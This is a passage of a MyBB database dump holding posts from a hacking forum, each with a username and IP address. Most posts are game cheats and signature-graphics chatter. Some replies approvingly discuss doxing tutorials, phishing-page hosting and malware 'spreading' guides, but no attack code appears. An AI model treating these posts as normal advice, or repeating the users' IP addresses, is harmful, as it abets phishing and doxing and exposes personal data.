'83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'eb0a90849721820aeed101fc735189a0', '0', '0'); INSERT INTO mybb_posts VALUES('5343', '941', '5271', '35', 'RE: Logo Competition for LH?', '0', '228', 'VirtualLegend', '1350557323', 'I think it\'s a good idea', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '53f7cb2997420c2c147fa0d47253c772', '0', '0'); INSERT INTO mybb_posts VALUES('5344', '844', '4418', '73', 'RE: TEMPLE RUN CHEAT (UNLIMITED RUN)', '0', '100', '??zg???g????61', '1350557901', 'Nope they patched it, now it only works for a little bit then it gives you the achievement \"the glitch\" and generates obstacles. You guys probably haven\'t updated it.', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', 'a560df4416d510aa74b6cea8cbaa3b06', '0', '0'); INSERT INTO mybb_posts VALUES('5345', '937', '5258', '19', 'RE: Nude Bot- Mr. Do you want to fap?', '0', '228', 'VirtualLegend', '1350558427', 'This kinda Fails. Don\'t you think', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'a248658413113007e02d2f06b62bd8c7', '0', '0'); INSERT INTO mybb_posts VALUES('5346', '945', '5319', '7', 'RE: I dont want.......', '0', '100', '??zg???g????61', '1350558471', '[quote=\'R?????zo?\' pid=\'5319\' dateline=\'1350551400\']\r\nI think the post and PM thing is to keep the thread alive, I\'ve posted few downloads here and nobody replies but has a ton of views, wonder why :P\r\n[/quote]\r\n\r\nExactly, post and pm stops people from leaching.', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '53b6cf818b85b31f2d2be7e89fb23ddf', '0', '0'); INSERT INTO mybb_posts VALUES('5347', '50', '132', '12', 'RE: [tut]How to DOX', '0', '228', 'VirtualLegend', '1350558532', 'This is very helpfull Thanks for the Guide!!!', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '79e092e17948d42af8af9cef0bc7f55d', '0', '0'); INSERT INTO mybb_posts VALUES('5348', '938', '5259', '46', 'RE: List of good webhosts to host your phishing pages', '0', '228', 'VirtualLegend', '1350558703', 'Nice list. I Will check it out !', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '904866692558445f711419165a82c852', '0', '0'); INSERT INTO mybb_posts VALUES('5349', '950', '0', '35', 'Which theme do you like better?', '0', '222', 'Exposé', '1350558730', 'Do you like this one...\r\n\r\nhttp://www.purevb.com/demo/forum.php?styleid=147\r\n\r\nor....\r\n\r\none like I already have setup...\r\n\r\nhttp://badassforums.net', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'a2b1a5078b9159561e4bd05872474f9b', '0', '0'); INSERT INTO mybb_posts VALUES('5350', '948', '5336', '74', 'RE: MINECRAFT world download', '0', '62', 'R?????zo?', '1350559555', 'I will give this a try, looks cool :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '4b3a4ba1a9454f49bdca103800fff32a', '0', '0'); INSERT INTO mybb_posts VALUES('5351', '950', '5349', '35', 'RE: Which theme do you like better?', '0', '62', 'R?????zo?', '1350559995', 'Both look cool, but the 2nd one is better :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'a2d4502a12929befd7046ac652aab06b', '0', '0'); INSERT INTO mybb_posts VALUES('5352', '941', '5271', '35', 'RE: Logo Competition for LH?', '0', '61', 'NXK', '1350561413', 'Thread has been moved, And yes I think this is a pretty good idea :]', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '3dd3c6e5f10c3c3281246ecf0c702bae', '0', '0'); INSERT INTO mybb_posts VALUES('5353', '928', '5194', '49', 'RE: MOTM', '0', '205', 'mothered', '1350561857', 'Yeah, this\'ll be a good addition to the forum.\r\n\r\nIt\'s a great Incentive to members.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '13e4c362ad3d62f9a4ae94b0a3445257', '0', '0'); INSERT INTO mybb_posts VALUES('5354', '945', '5288', '7', 'RE: I dont want.......', '0', '61', 'NXK', '1350561941', 'I\'m pretty sure joker made it a rule to not do that, If you see any threads with post/pm let me know. Ill take care of it.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '50bc3ff8c8ca97e937e83ce213e9fba8', '0', '0'); INSERT INTO mybb_posts VALUES('5355', '935', '5256', '19', '[Junk]Couple of cracked programs.', '0', '61', 'NXK', '1350561999', 'This thread has been junked.\n[hr]\nThis thread has been junked.', '99.253.94.204', '1677549260', '1', '0', '61', '1350562000', '1', '', '0', '0'); INSERT INTO mybb_posts VALUES('5356', '938', '5259', '46', 'RE: List of good webhosts to host your phishing pages', '0', '61', 'NXK', '1350562142', 'Ill be checking these hosts out soon. Mine doesn\'t like me hosting malicious content.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '562c6e2e01cd23b9e5cfd8df5fd0e0fd', '0', '0'); INSERT INTO mybb_posts VALUES('5357', '945', '5354', '7', 'RE: I dont want.......', '0', '205', 'mothered', '1350562219', '[quote=\'NXK\' pid=\'5354\' dateline=\'1350561941\']\r\nI\'m pretty sure joker made it a rule to not do that, If you see any threads with post/pm let me know. Ill take care of it.\r\n[/quote]\r\n\r\nShall do mate.\r\n\r\nI do agree, that the download link should be provided In the thread.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '96e06b8089a80d9a2e5688394ad89346', '0', '0'); INSERT INTO mybb_posts VALUES('5358', '938', '5259', '46', 'RE: List of good webhosts to host your phishing pages', '0', '205', 'mothered', '1350562469', 'x10Hosting Is pretty good. \r\n\r\nI haven\'t checked the rest, hence shall do so soon.\r\nThanks mate.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'b6e437ade88af970cfbbc6b30a7df758', '0', '0'); INSERT INTO mybb_posts VALUES('5359', '775', '3997', '75', 'RE: GTA San Andreas Cheats', '0', '205', 'mothered', '1350562653', 'Nice one mate.\r\n\r\nI\'ll forward this to a friend of mine, who\'ll certainly find It of benefit.\r\nAppreciated.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'dd60130d06f0708e0fa45f4c43785cf1', '0', '0'); INSERT INTO mybb_posts VALUES('5360', '821', '4294', '28', 'RE: What\'s on your mind or what are your future plans?', '0', '205', 'mothered', '1350563067', 'I\'m thinking what I should think of next, but I\'ve already thought It, so I think I\'ll think of something after the next thought, but when the next thought comes, I would have thought of It already.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '4bd3575dd36355ac3fa4814201dfb9a5', '0', '0'); INSERT INTO mybb_posts VALUES('5361', '940', '5270', '7', 'RE: TheAnarchist I have your dox!', '0', '228', 'VirtualLegend', '1350563100', 'The Anarchist are just little kids', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'c372336fabcc34b9ff929399b0d4fe12', '0', '0'); INSERT INTO mybb_posts VALUES('5362', '928', '5194', '49', 'RE: MOTM', '0', '228', 'VirtualLegend', '1350563162', 'Very good idea Keep it up like this !', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '0f3900d2f2af2fc1321c54c7b87b5f7a', '0', '0'); INSERT INTO mybb_posts VALUES('5363', '951', '0', '71', 'L33thacking Minecraft Server', '10', '228', 'VirtualLegend', '1350563758', '[align=center][size=medium][color=#32CD32]Hello Gamers,\r\n\r\nI had a idea to make our own L33thacking Minecraft server. Unfortunately i don\'t have any experience on how to make a minecraft server. So thats why I\'m looking for someone that has experience. \r\n\r\nIf you think It\'s a good idea let me know, or else i won\'t do it \r\n\r\nI was thinking of a Raiding server with clans. I like to fight with other clans/people. If you have a other idea, let me know][/color][/size][/align]', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'fff056401766395e7a31ed03dd70ad9b', '0', '0'); INSERT INTO mybb_posts VALUES('5364', '928', '5212', '49', 'RE: MOTM', '0', '2', 'Apathy', '1350563774', '[quote=\'ƒ???????????g\' pid=\'5212\' dateline=\'1350525419\']\r\nLol yeh I think joker or a super mod should post this...to make it official\r\n[/quote]\r\n\r\nWhat am I chopped liver?:?:', '173.206.129.235', '-1378975253', '0', '0', '0', '0', '1', '41aff4d3b702624fde4e9afe5efcbc21', '0', '0'); INSERT INTO mybb_posts VALUES('5365', '710', '3637', '12', 'RE: Ultimate Spreading Guide', '0', '228', 'VirtualLegend', '1350563972', 'Very Helpfull Tutorial !!!', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '79ec2ad44020bfcbcfb49353a67c4293', '0', '0'); INSERT INTO mybb_posts VALUES('5366', '952', '0', '34', 'A nice clean signature tutorial', '9', '2', 'Apathy', '1350564320', '[img]http://fc03.deviantart.net/fs70/i/2012/032/b/2/glamorous_signature_tutorial_by_xatorihs-d4o7svk.png[/img]\r\n\r\n\r\n\r\nCredits to xatorihs.', '173.206.129.235', '-1378975253', '0', '0', '0', '0', '1', '23371a424333c4eaa53b736bad3c7078', '0', '0'); INSERT INTO mybb_posts VALUES('5367', '953', '0', '34', '| [ Newbie Guide ] Photoshop Site\'s For Beginners | [ Very Helpful ] |', '0', '228', 'VirtualLegend', '1350564502', '[color=#FFFFFF][align=center]Hi, \r\n\r\nRenders/C4d\'s\r\nhttp://www.planetrenders.net\r\nhttp://www.clantemplates.com/renders/gallery/\r\nhttp://www.thedesignworld.com/renders/\r\n\r\n\r\nTutorials\r\nhttp://www.sigtutorials.com/\r\nhttp://www.gfxpalace.com\r\nhttp://www.gfxvoid.com\r\nhttp://www.signaturetutorials.com/\r\nhttp://www.allsigs.com/\r\n\r\n\r\nAll The links Above are very Helpful. If you want to get new ideas or methods than the links are very helpful to you. More links are welcome.[/align][/color]', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '8537de04e4adeeef169e231f464dd12f', '0', '0'); INSERT INTO mybb_posts VALUES('5368', '928', '5194', '49', 'RE: MOTM', '0', '222', 'Exposé', '1350565505', 'Haha mah B bro...nah...always forget about ya....', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '0d94cd88f08fd4dde1217eb572690ab5', '0', '0'); INSERT INTO mybb_posts VALUES('5369', '321', '1502', '34', 'RE: Full Signature Tutorial', '0', '228', 'VirtualLegend', '1350571356', 'Looks Awesome and helpful', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '7eed189e67bb7425028aa3d6c0aa243b', '0', '0'); INSERT INTO mybb_posts VALUES('5370', '950', '5349', '35', 'RE: Which theme do you like better?', '0', '228', 'VirtualLegend', '1350571550', 'I think the first looks better, i don\'t like the pumpkin avatar :p', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '5de067271b96ace1ede47c4dc5748fd0', '0', '0'); INSERT INTO mybb_posts VALUES('5371', '954', '0', '35', '/\\ New Signature | Rate My Graphics !!! /\\', '0', '228', 'VirtualLegend', '1350572880', '[align=center][size=medium][color=#FFFFFF]Hello,\r\n\r\nI made a new signature:\r\nWhat do you think? \r\nAny tips?\r\n[img]http://i.imgur.com/97auP.jpg[/img]\r\n\r\nIf you want to use it. Go Ahead I don\'t mind. If you want a other signature. I will make one for you. Just leave a post behind[/color][/size][/align]', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '04fb012a53b471e78483fd5b08e3d781', '0', '0'); INSERT INTO mybb_posts VALUES('5372', '952', '5366', '34', 'RE: A nice clean signature tutorial', '0', '228', 'VirtualLegend', '1350573171', 'Nice Tutorial, but did you make it yourself?', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '075bba952c50dc32c37d975039baa9c4', '0', '0'); INSERT INTO mybb_posts VALUES('5373', '940', '5270', '7', 'RE: TheAnarchist I have your dox!', '0', '61', 'NXK', '1350574549', 'We worked on it for a very long time last night, But damn forsaken went all night.. Huge props to this guy.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '8f5e915c98e0b0ddcc986303aba0e978', '0', '0'); INSERT INTO mybb_posts VALUES('5374', '873', '4718', '7', 'RE: What do you think of Facebook?', '0', '61', 'NXK', '1350574616', 'It comes it handy to talk to friends, and keep track of upcoming social events. But twitter is where it\'s at :)', '99.253.94.204', '1677549260', '1', '0', '61', '1350587062', '1', '3b33a32881010a7d8f2aa0ac75206830', '0', '1350587062'); INSERT INTO mybb_posts VALUES('5375', '873', '4718', '7', 'RE: What do you think of Facebook?', '0', '228', 'VirtualLegend', '1350575421', 'Don\'t have FaceBook but it seems awesome and i heard it\'s great for promoting', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'c736e543400b2929898df73183ee26b5', '0', '0'); INSERT INTO mybb_posts VALUES('5376', '954', '5371', '35', 'RE: /\\ New Signature | Rate My Graphics !!! /\\', '0', '62', 'R?????zo?', '1350576110', 'Looks cool, I like it!\nGood job.', '188.37.47.96', '-1138413728', '1', '0', '0', '0', '1', '715875848cdd4d3704d1bf9fdb49fee5', '0', '0'); INSERT INTO mybb_posts VALUES('5377', '951', '5363', '71', 'RE: L33thacking Minecraft Server', '0', '100', '??zg???g????61', '1350578459', 'Fortunately I have a LOT of experience running servers. I\'m sending you a Skype message to you now.', '96.237.179.21', '1626190613', '1', '0', '0', '0', '1', 'd66e040208aa9c484202259db645c2f5', '0', '0'); INSERT INTO mybb_posts VALUES('5378', '190', '665', '56', 'RE: Copy and paste game', '0', '199', 'Anonymous™', '1350578833', 'http://www.socialblade.com/youtube/user/YOURCHANNEL', '85.230.51.22', '1441149718', '1', '0', '0', '0', '1', '5d0131c2841afeb00ef8e39142af16a1', '0', '0'); INSERT INTO mybb_posts VALUES('5379', '948', '5350', '74', 'RE: MINECRAFT world download', '0', '257', 'XxTREYZxX', '1350589683', '[quote=\'R?????zo?\' pid=\'5350\' dateline=\'1350559555\']\r\nI will give this a try, looks cool :)\r\n[/quote]\r\n\r\nhow did it go for you + he is only 8', '203.104.11.12', '-882373876', '1', '0', '0', '0', '1', '2d3c02faf4c654514a47f6489767d97a', '0', '0'); INSERT INTO mybb_posts VALUES('5380', '954', '5371', '35', 'RE: /\\ New Signature | Rate My Graphics !!! /\\', '0', '257', 'XxTREYZxX', '1350590063', 'i really like it,\nkeep up the good work :)', '203.104.11.12', '-882373876', '1', '0', '0', '0', '1', 'cc6a5d504e0ada4e56e1bd5607e68b42', '0', '0'); INSERT INTO mybb_posts VALUES('5381', '918', '5311', '65', 'RE: I feel famous', '0', '264', 'D?ea', '1350590121', '[quote=\'R?????zo?\' pid=\'5311\' dateline=\'1350550572\']\r\nDont you get like loads of money if you partner with them though?\r\n[/quote]\r\nThey takes 80% of your earnings.\r\nRPMNetwork / SocialBlase, only takes 40%', '90.185.118.218', '1522104026', '1', '0', '0', '0', '1', '0e2588333b9a8fee3fee22b7ad142f73', '0', '0'); INSERT INTO mybb_posts VALUES('5382', '938', '5259', '46', 'RE: List of good webhosts to host your phishing pages', '0', '257', 'XxTREYZxX', '1350590508', 'thanks for the great share.\nits pretty good :)', '203.104.11.12', '-882373876', '1', '0', '0', '0', '1', '5740328af95c0fb3fe6dc2878f439388', '0', '0'); INSERT INTO mybb_posts VALUES('5383', '321', '1502', '34', 'RE: Full Signature Tutorial', '0', '257', 'XxTREYZxX', '1350591932', 'this looks great i love it ,keep up the good work:)', '203.104.11.4', '-882373884', '1', '0', '0', '0', '1', '2880039fd528d034bed7a7a4be6a24e4', '0', '0'); INSERT INTO mybb_posts VALUES('5384', '955', '0', '75', 'saints row 2 cheats', '0', '257', 'XxTREYZxX', '1350592621', 'hey l33T, i saw a thread about saints row 3, so today im going to do a saints row 2 cheats. hope you enjoy:O\r\n\r\nPause the game, then access the cell phone. Select \"Dial\", then enter one of the following numbers, including the # symbol, and choose \"Call\". If you entered the code correctly, a message will appear. Then, go to \"Cheats\", and select the now unlocked option. \r\n\r\nFull Health #1\r\nCar Mass (increased mass for harder collisions) #2\r\nMilk Bones (increased melee attack damage) #3\r\nAdd Police Notoriety (+1 star to police wanted meter) #4\r\nPlayer Pratfalls (press LB or RB to fall) #5\r\nInfinite Sprint #6\r\nUnlimited Clip (never reload, except for RPGs) #9\r\nInfinite Ammo #11\r\nHeaven Bound (killed bodies float upward) #12\r\nAdd Gang Notoriety (+1 gang attack level) #35\r\nNever Die #36\r\nNo Cop Notoriety #50\r\nNo Gang Notoriety #51\r\nI Am Giant (become very tall) #200\r\nItty Bitty (become very short) #201\r\nGive Cash (gain $1,000) #2274666399\r\nRepair Car (fixes car, boat, and helicopter damage) #1056\r\nAmbulance #1040\r\nAnchor #1041\r\nAtlasbreaker #1042\r\nAttrazione #1043\r\nBackdraft #1044\r\nBackhoe #1045\r\nBag Boy #1046\r\nBaron #1047\r\nBear #1048\r\nBootlegger #1049\r\nBulldog #1050\r\nBulldozer #1051\r\nCompton #1052\r\nEiswolf #1053\r\nFBI #1054\r\nFive0 #1055\r\nHollywood #1057\r\nJustice #1058\r\nKent #1059\r\nMag #1060\r\nMixmaster #1061\r\nMongoose #1062\r\nOring #1063\r\nPhoenix #1064\r\nQuasar #1065\r\nQuota #1066\r\nRampage #1067\r\nRaycaster #1068\r\nReaper #1069\r\nSeptic Avenger #1070\r\nShaft #1071\r\nStilwater Municipal #1072\r\nSuperiore #1073\r\nTaxi #1074\r\nThe Job #1075\r\nTitan #1076\r\nToad #1077\r\nVarsity #1078\r\nVenom Classic #1079\r\nVortex #1080\r\nZenith #1081\r\nHorizon (commerical helicopter) #711\r\nSnipes57 (executive private jet) #712\r\nTornado (police helicopter with minigun and anti-tank missiles; can lock onto other vehicles or be manually aimed) #713\r\nWolverine (P-51 Mustang-style airplane with machine gun) #714\r\nKaneda (custom street racing motorcycle) #801\r\nKenshin (street racing motorcycle) #802\r\nMelbourne (Harley-style motorcycle) #803\r\nSabretooth (custom Harley-style motorcycle) #804\r\nSandstorm (dirtbike) #805\r\nWidowmaker (moped) #806\r\nHurricane (speedboat) #825\r\nMiami #826\r\nPython #827\r\nShark (personal watercraft) #828\r\nSkipper (yacht) #829\r\n \r\nhope you enjoyed', '203.104.11.8', '-882373880', '1', '0', '0', '0', '1', 'baef6953323c1df291a60b3cb8d361f4', '0', '0'); INSERT INTO mybb_posts VALUES('5385', '956', '0', '75', 'Halo tips,tricks and cheats :O', '0', '257', 'XxTREYZxX', '1350593169', 'hey L33T, here are some halo 3 cheats,tips.tricks:O\r\nhope you enjoy \r\n\r\nLower weapon\r\nDuring a local match or replay, click Left Analog-stick + LB+ RB + A + Down for approximately three seconds. If done correctly, your weapon will not be visible on your screen. When you shoot, your weapon will be raised again. -From: Dirttbagg and darthvader302\r\n\r\nShow coordinates\r\nDuring a local match or replay, click Left Analog-stick + click Right Analog-stick + LB + RB + Down/Right.\r\n\r\nToggle panning camera\r\nDuring a local match or replay, click Left Analog-stick + click Right Analog-stick + LB + RB + Up/Left.\r\n\r\nInfinite Spartan laser in Halo mission\r\nUse the following trick to get a Spartan laser with unlimited ammunition in the \"Halo\" mission. Play through the level until you meet up with Sergeant Johnson. Shoot him until he falls down and drops the Spartan laser. Quickly pick it up, and shoot it at him. Keep shooting him until he kills you. When you respawn, knock him down again, and pick up his laser. He should get back up with another laser on his back. When he does, shoot him down again, and pick up the new gun he drops. This laser should now have unlimited Spartan ammunition. This makes it easier to destroy the Guilty Spark 343. -From: Camuel\r\n\r\nKatana\r\nSuccessfully complete all achievements (1000/1000) and find all Skulls to unlock the Katana.\r\n\r\nRecon armor (Mythic Map Pack DLC)\r\nGet the three \"Vid Master Challenge\" achievements in the \"Mythic Map Pack\" bonus downloadable content to unlock the Recon armor.\r\n\r\nBonus downloadable content\r\nSuccessfully complete the game on the Legendary difficulty to get bonus pictures and a \"Making of\" video from Xbox Live.\r\n\r\nAlternate endings\r\nThere are three endings. The first ending is shown when the game is successfully completed on the Easy, Normal, or Heroic difficulty setting. The second ending is shown when the game is successfully completed on the Legendary difficulty setting. The third ending is shown when the game is successfully completed on the Legendary difficulty setting with all Skulls activated.\r\n\r\nEasier Legendary mode\r\nIf you are playing alone on the Legendary difficulty setting, turn on an idle second player to stay behind. If you die, you will respawn instead of restarting.\r\n\r\nSuper fast Spartan laser fire\r\nIn Forge mode, get a Spartan laser. Charge it until it is almost about to fire. Before you fire, turn into the Monitor. Fly around until you find a target. Before you turn back into a human, hold RT to fire the Spartan laser almost instantly (if done correctly). You can use the Monitor\'s aimer to aim the laser.\r\n\r\nSmarter respawning\r\nWhen playing in Co-op mode on the Legendary difficulty setting, it is best to have one player keep their distance from the enemy at all times. By doing this, if the rest of the players die, they will respawn around the player that is farther back, rather than having to restart at the checkpoint.\r\n\r\nPreventing lag\r\nTo clear the hard drive cache and prevent lag in Solo and Multiplayer mode, when starting the game, hold A + Up. Select \"Yes\" when you are asked if you want to clear the cache.\r\n\r\nEasy experience in Multiplayer mode\r\nNote: This trick requires four active accounts on your console that are all able to play on Xbox Live. Enter the matchmaking lobby, and choose \"Social\", then \"Rumble Pit\". Sign all four of your accounts in the lobby. In free for all modes, you have to be in the top three to earn experience points. Start matchmaking, and it should find two additional players. Once the game begins, you can simply do nothing. Once the game ends, all four of your accounts will tie for third place, giving all of them easy experience points. -From: Brandon Adkins\r\n\r\nGetting in the same ranked Lone Wolves game\r\nGo to the Xbox 360 Dashboard. Change your language to the second option from the bottom, then start Halo 3. Invite four other friends that are about the same rank as you, and have them change their language to the same one as you. Get everyone in the same party; everyone must search at the same time. Everyone must then make a game in Lone Wolves. Before you go to start the countdown, press X to change the search options to the bottom one, which is to search for the same language. If done correctly, you should be in the same ranked Lone Wolves game as your friends. You can now get achievements or level someone up.\r\n\r\nExtra grenades\r\nIn Multiplayer or System Link mode, when you kill someone, slash their dead body with the Energy Sword for more grenades come out of it.\r\n\r\nArmor permutations\r\nSuccessfully complete the indicated task in Campaign mode to unlock the corresponding armor part in Multiplayer mode:\r\n\r\nthanks for your time i hop you enjoy them:)', '203.104.11.3', '-882373885', '1', '0', '0', '0', '1', '178a29f08844a7945e3019ad0879884a', '0', '0'); INSERT INTO mybb_posts VALUES('5386', '957', '0', '9', '| [ Get ] My Mobile Business In A Box | Start Your Own Mobile Business |', '0', '228', 'VirtualLegend', '1350593317', '[align=center][img]http://img714.imageshack.us/img714/5963/wso1.gif[/img]\r\n[img]http://img221.imageshack.us/img221/3025/wso2.gif[/img]\r\n[img]http://img96.imageshack.us/img96/7060/wso3.gif[/img]\r\n[img]http://img842.imageshack.us/img842/2774/wso4.gif[/img]\r\n[img]http://img842.imageshack.us/img842/2774/wso4.gif[/img]\r\n[img]http://img196.imageshack.us/img196/5286/wso5.gif[/img]\r\n[img]http://img196.imageshack.us/img196/5286/wso5.gif[/img]\r\n\r\n[color=#FF0000][size=xx-large]Download Link:\r\n[quote]https://www.dropbox.com/sh/2htazms11o1djgb/vn_fGztT82[/quote][/size][/color][/align]', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '60be7721ca1a48dfec0a16152d88c488', '0', '0'); INSERT INTO mybb_posts VALUES('5387', '958', '0', '73', 'subway surfers', '17', '257', 'XxTREYZxX', '1350593440', 'hey L33T,, here are some subway surfer cheats and tips hopr you enjoy :P\r\n\r\nUnlockables\r\nAny character unlocked\r\nGo onto the characters click select on the first boy, then you go onto the girl and hold down select. If you want any other character keep holding of the button select and slide across to the next character or the character you want and take your finger of and click select on the character you want!\r\n\r\nUnlocking Fresh faster\r\nPress on the kid with the hood. While selected go over to fresh or any of the other character and press the box where the fraction of the amount you have for that character is. To play as say spike after fresh you\'ll have to do it while selected hood kid is taken as well.\r\n\r\nTwo character tokens\r\nJust use your coins to buy mystery boxes, they contain character tokens and coins. Or if you run in between 2 trains than you will flip back and hit the screen and so will the cop and his dog.\r\n\r\nHints\r\nPower-ups\r\nPower-ups that you can pick up while playing are:\r\n\r\nJetpack which allows you to fly over all of the trains and collect a trail of coins along the way.\r\nSuper Sneakers will make your character run faster than normal, and will pick up any coins under them.\r\nCoin Magnet will collect all of the coins in the vicinity around you.\r\n2X Multiplier will double your score while it is active.\r\nAll of these power-ups only last a limited time, so make sure you take advantage of them while they’re active.\r\n\r\nBump Into Barriers\r\nJump early or jump late and you\'ll bump into the red and white barriers without being caught by the inspector and his dog.\r\n\r\nFriend Runs\r\nA cool way to make extra coins is by having your friends run so you can earn additional money. For each 50 friend runs, you will earn a coin bag with valuable coins inside.', '203.104.11.7', '-882373881', '1', '0', '0', '0', '1', '039daed94067505b3789c78ff179a203', '0', '0'); INSERT INTO mybb_posts VALUES('5388', '907', '4998', '7', 'RE: Ohio Bus Driver Uppercuts Lady | Mortal Kombat Edit', '0', '82', 'iTzIpod', '1350593476', 'I actually saw a couple of these on Youtube already.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '1dc9cb3d393dde4d1993f2deec920383', '0', '0'); INSERT INTO mybb_posts VALUES('5389', '930', '5197', '7', 'RE: am i a nice and helpfull member', '0', '82', 'iTzIpod', '1350593604', 'You gotta for your spelling and grammar. \nYou sometimes made LQ posts in the past.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e9e2a4483f950375dd01eb52c96fd24d', '0', '0'); INSERT INTO mybb_posts VALUES('5390', '907', '4998', '7', 'RE: Ohio Bus Driver Uppercuts Lady | Mortal Kombat Edit', '0', '228', 'VirtualLegend', '1350593634', 'This Man is Awesome', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '98d7ad926ceb9e32386fbcc0cce67a2d', '0', '0'); INSERT INTO mybb_posts VALUES('5391', '936', '5257', '18', 'RE: 4 adf.ly bots with proxygrabber', '0', '82', 'iTzIpod', '1350593653', 'Seems legit.\nWill check it out.\n\nWhich one is the best? In your opinion?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9aaede89972f399edee9b39f2a15d188', '0', '0'); INSERT INTO mybb_posts VALUES('5392', '816', '4276', '9', 'RE: | Do You Want To Get More Traffic | List of Traffic Exchange Sites |', '0', '82', 'iTzIpod', '1350593833', 'customhits.net is a Traffic Exchange website I use.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e44fbd1a42ed3d443b993a21829152b3', '0', '0'); INSERT INTO mybb_posts VALUES('5393', '930', '5389', '7', 'RE: am i a nice and helpfull member', '0', '257', 'XxTREYZxX', '1350593841', '[quote=\'iTzIpod\' pid=\'5389\' dateline=\'1350593604\']\r\nYou gotta for your spelling and grammar. \r\nYou sometimes made LQ posts in the past.\r\n[/quote]\r\n\r\nreally! sorry for that, i used to do that when i was a noob:O', '203.104.11.6', '-882373882', '1', '0', '0', '0', '1', '03860e20555fd5c378712fbdc5c7d542', '0', '0'); INSERT INTO mybb_posts VALUES('5394', '910', '5021', '49', 'RE: Referral Contest?', '0', '82', 'iTzIpod', '1350593867', 'And hopefully they\'re active :)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '47190b240d12a3ccbe07f8c23652756c', '0', '0'); INSERT INTO mybb_posts VALUES('5395', '816', '4276', '9', 'RE: | Do You Want To Get More Traffic | List of Traffic Exchange Sites |', '0', '257', 'XxTREYZxX', '1350593906', 'thanks for the great list, appreciated much :)', '203.104.11.6', '-882373882', '1', '0', '0', '0', '1', 'f93440485f10200cbd05045d359384dc', '0', '0'); INSERT INTO mybb_posts VALUES('5396', '939', '5267', '49', 'RE: a contest', '0', '82', 'iTzIpod', '1350593919', 'Can you fix your grammar? \n\nUm.\nYeah t3h jok3r gave away too much Upgrades for free.\nThat\'s my opinion.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '5bfeef3b7314ff429414af441a861365', '0', '0'); INSERT INTO mybb_posts VALUES('5397', '958', '5387', '73', 'RE: subway surfers', '0', '62', 'R?????zo?', '1350593961', 'Nice cheats, thanks for this bro.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '99e3176ad3cb41b5829b1848bc2eaeca', '0', '0'); INSERT INTO mybb_posts VALUES('5398', '921', '5120', '4', 'RE: Hey', '0', '82', 'iTzIpod', '1350593964', 'Welcome to L33tHacking bro.\nEnjoy your stay.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '69bf1c8e8f7dd597af2ee00a62043d91', '0', '0'); INSERT INTO mybb_posts VALUES('5399', '861', '4598', '7', 'RE: L33T Hacking Milestones', '0', '82', 'iTzIpod', '1350594007', 'Nice job L33tHacking.\nA lot of members became more active now :)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '7f3577a10b7405d62129aa6ec4b7edb9', '0', '0'); INSERT INTO mybb_posts VALUES('5400', '957', '5386', '9', 'RE: | [ Get ] My Mobile Business In A Box | Start Your Own Mobile Business |', '0', '62', 'R?????zo?', '1350594119', 'Looks great, thanks for sharing bro :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '70ef8f77f1dd12b9dbb135dead224c22', '0', '0'); INSERT INTO mybb_posts VALUES('5401', '943', '5283', '74', 'RE: MINECRAFT PREMIUM GIVEAWAY(no surveys)', '0', '82', 'iTzIpod', '1350594124', 'I want a MC account :3 xD I already have one. But I got a friend that is being cheap and won\'t buy one from me. So I\'ll give him this one for free.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '8cb4b42a33364c0958b3ce3ccee1a057', '0', '0'); INSERT INTO mybb_posts VALUES('5402', '496', '2408', '14', 'RE: Free Proxy List', '0', '214', 'Rave™', '1350594126', 'I\'d like the list too <3 [code] [/code]', '71.67.179.16', '1195619088', '1', '0', '0', '0', '1', '11668c61f2f78ab41c9dc6b7b95abd96', '0', '0'); INSERT INTO mybb_posts VALUES('5403', '958', '5387', '73', 'RE: subway surfers', '0', '257', 'XxTREYZxX', '1350594151', 'no worries hoped i helped you, and enjoy :)', '203.104.11.5', '-882373883', '1', '0', '0', '0', '1', '56d5598fdd9f36652d23b73aec6e1bdb', '0', '0'); INSERT INTO mybb_posts VALUES('5404', '947', '5329', '8', 'RE: GANGNAM STYLE', '0', '82', 'iTzIpod', '1350594166', 'Ayeee Sexy Lady\n\nOoop\nOoop\nOoop\nOppa\nGangnam Style.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b46fbd738d0fb63fd6efd97340f1276c', 